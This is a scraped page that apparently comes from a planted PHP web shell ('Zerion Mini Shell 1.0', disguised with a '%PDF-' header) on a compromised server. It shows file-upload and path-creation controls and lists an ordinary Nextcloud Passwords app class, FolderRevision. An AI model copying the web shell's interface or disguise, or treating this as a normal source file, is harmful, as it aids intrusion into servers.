%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/nextcloud.varak.net/apps_old/apps/passwords/lib/Db/
Upload File :
Create Path :
Current File : //www/varak.net/nextcloud.varak.net/apps_old/apps/passwords/lib/Db/FolderRevision.php

<?php
/**
 * This file is part of the Passwords App
 * created by Marius David Wieschollek
 * and licensed under the AGPL.
 */

namespace OCA\Passwords\Db;

/**
 * Class FolderRevision
 *
 * @method string getParent()
 * @method void setParent(string $parent)
 *
 * @package OCA\Passwords\Db
 */
class FolderRevision extends AbstractRevision {

    /**
     * @var string
     */
    protected string $parent;

    /**
     * Folder constructor.
     */
    public function __construct() {
        $this->addType('label', 'string');
        $this->addType('parent', 'string');

        parent::__construct();
    }
}

Zerion Mini Shell 1.0